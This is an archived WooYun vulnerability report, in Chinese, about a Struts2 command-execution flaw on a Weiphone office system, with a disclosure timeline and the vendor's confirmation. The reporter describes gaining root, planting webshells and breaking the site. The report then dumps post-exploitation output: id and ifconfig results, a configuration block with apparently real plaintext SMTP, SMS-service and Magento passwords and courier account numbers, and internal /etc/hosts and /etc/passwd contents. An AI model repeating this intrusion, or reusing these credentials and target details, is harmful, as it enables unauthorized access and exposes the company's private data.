乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-10: 细节已通知厂商并且等待厂商处理中 2015-05-11: 厂商已经确认,细节仅向厂商公开 2015-05-21: 细节向核心白帽子及相关领域专家公开 2015-05-31: 细节向普通白帽子公开 2015-06-10: 细节向实习白帽子公开 2015-06-25: 细节向公众公开
本来想深入的。。
绑定的域名
http://office.feng.com:8099/
struts2命令执行:http://113.108.53.7:8099/system/systemLogonAction.doroot权限,直接getshell
root密码
shell地址:
1.http://**.**.**/for.jsp_2.http://**.**.**/js/js.jsp
站被我弄坏了。。你们自己删除吧info
[/usr/local/software/tomcat/webapps/ROOT/]$ iduid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=root:system_r:unconfined_t:SystemLow-SystemHigh[/usr/local/software/tomcat/webapps/ROOT/]$ ifconfigeth0 Link encap:Ethernet HWaddr 00:50:56:9A:D3:6A inet addr:192.168.9.21 Bcast:192.168.9.255 Mask:255.255.255.0 inet6 addr: fe80::250:56ff:fe9a:d36a/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:222501567 errors:0 dropped:0 overruns:0 frame:0 TX packets:85925803 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:37493228829 (34.9 GiB) TX bytes:29491862734 (27.4 GiB)lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:177914494 errors:0 dropped:0 overruns:0 frame:0 TX packets:177914494 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:45454712043 (42.3 GiB) TX bytes:45454712043 (42.3 GiB) <magento> <userName>user123</userName> <password>123456</password> </magento> <sms_webservice> <sn>SDK-ADC-010-00020</sn> <password>175721</password> <serviceURL>http://117.79.237.3:8060/webservice.asmx</serviceURL> </sms_webservice> <emailConfig> <smtpHost>mail.weiphone.com</smtpHost> <emailFrom>仓库系统</emailFrom> <emailTo>[email protected]</emailTo> <userName>[email protected]</userName> <password>FengBuyadmin2013</password> <subject>威锋网订单提示</subject> </emailConfig> <order_auto> <order_interval>20</order_interval> </order_auto> <expressConfig> <senderName>威锋网</senderName> <magentoSenderName>威锋商城</magentoSenderName> <senderAccountNo>275925233</senderAccountNo> <senderSFAccountNo>7553356949</senderSFAccountNo> <senderSFAccountNoNew>7552059551</senderSFAccountNoNew> <senderFEDEXAccountNo>7 5 5 3 1 3 5 6 2 9</senderFEDEXAccountNo> <phone>0755-26857667</phone> <servicePhone>4006078090</servicePhone> <region>广东省</region> <city>深圳市</city> <district>南山区</district> <address_id>440305</address_id> <address>深圳市南山区南海大道1057号科技二期B座403</address> <postCode>518067</postCode> </expressConfig>
部分dns信息
h.root-servers.net. 277875 IN A 128.63.2.53e.root-servers.net. 277875 IN A 192.203.230.10a.root-servers.net. 277875 IN A 198.41.0.4c.root-servers.net. 277875 IN A 192.33.4.12d.root-servers.net. 277875 IN A 199.7.91.13g.root-servers.net. 277875 IN A 192.112.36.4f.root-servers.net. 277875 IN A 192.5.5.241b.root-servers.net. 277875 IN A 192.228.79.201e.root-servers.net. 277875 IN A 192.203.230.10a.root-servers.net. 277875 IN A 198.41.0.4c.root-servers.net. 277875 IN A 192.33.4.12d.root-servers.net. 277875 IN A 199.7.91.13g.root-servers.net. 277875 IN A 192.112.36.4f.root-servers.net. 277875 IN A 192.5.5.241b.root-servers.net. 277875 IN A 192.228.79.201h.root-servers.net. 277875 IN A 128.63.2.53a.root-servers.net. 277799 IN A 198.41.0.4c.root-servers.net. 277799 IN A 192.33.4.12d.root-servers.net. 277799 IN A 199.7.91.13g.root-servers.net. 277799 IN A 192.112.36.4f.root-servers.net. 277799 IN A 192.5.5.241b.root-servers.net. 277799 IN A 192.228.79.201h.root-servers.net. 277799 IN A 128.63.2.53e.root-servers.net. 277799 IN A 192.203.230.10
192.168.9.30的部分信息
#127.0.0.1 localhost center.wefiler.com127.0.1.1 dev-30.staff.weiphone.com dev-30127.0.0.1 mx.phone.com localhost devapp.joyslink.com192.168.9.30 devapp.joyslink.com localhost# The following lines are desirable for IPv6 capable hosts::1 ip6-localhost ip6-loopbackfe00::0 ip6-localnetff00::0 ip6-mcastprefixff02::1 ip6-allnodesff02::2 ip6-allroutersroot:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh syslog:x:101:103::/home/syslog:/bin/false messagebus:x:102:105::/var/run/dbus:/bin/false whoopsie:x:103:106::/nonexistent:/bin/false landscape:x:104:109::/var/lib/landscape:/bin/false sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin jeff:x:1000:1000:jeff,,,:/home/jeff:/bin/bash mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false memcache:x:107:114:Memcached,,,:/nonexistent:/bin/false Debian-exim:x:108:115::/var/spool/exim4:/bin/false amavis:x:109:116:AMaViS system user,,,:/var/lib/amavis:/bin/sh cluebringer:x:110:117::/etc/cluebringer:/usr/sbin/nologin postfix:x:111:119::/var/spool/postfix:/bin/false clamav:x:112:121::/var/lib/clamav:/bin/false dovecot:x:113:122:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false dovenull:x:114:65534:Dovecot login user,,,:/nonexistent:/bin/false vmail:x:2000:2000::/var/vmail:/sbin/nologin iredadmin:x:2001:2001::/home/iredadmin:/sbin/nologin iredapd:x:2002:2002::/home/iredapd:/sbin/nologin zabbix:x:2003:2003::/home/zabbix:/bin/sh
就站点不用就关闭吧,或者禁止外网访问。
危害等级:中
漏洞Rank:10
确认时间:2015-05-11 10:20
谢谢提醒,修复中
暂无